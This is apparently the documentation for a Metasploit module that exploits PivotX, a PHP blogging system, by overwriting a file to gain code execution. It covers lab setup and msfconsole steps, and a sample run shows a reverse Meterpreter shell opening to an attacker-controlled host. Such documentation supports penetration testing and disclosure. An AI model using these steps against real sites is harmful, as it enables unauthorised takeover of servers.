8130316de9
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
1.6 KiB
1.6 KiB
Vulnerable Application
PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general. It's written in PHP and uses MySQL or flat files as a database.
Install steps:
- Install Apache2, MySQL, PHP8.2+
git clone https://github.com/pivotx/PivotX.git- Move
PivotXto webfolder - Run the following from the web folder
sudo chown -R www-data:www-data ./
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/pivotx_rce - Do:
set USERNAME [PivotX username] - Do:
set PASSWORD [PivotX password] - Do:
set RHOSTS [target IP] - Do:
set LHOST [attacker IP] - Do:
run
Options
USERNAME
PivotX username.
PASSWORD
PivotX password.
Scenarios
msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
[*] Logging in PivotX
[*] Modifying file and injecting payload
[*] Triggering payload
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200
[*] Restoring original content
meterpreter >
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data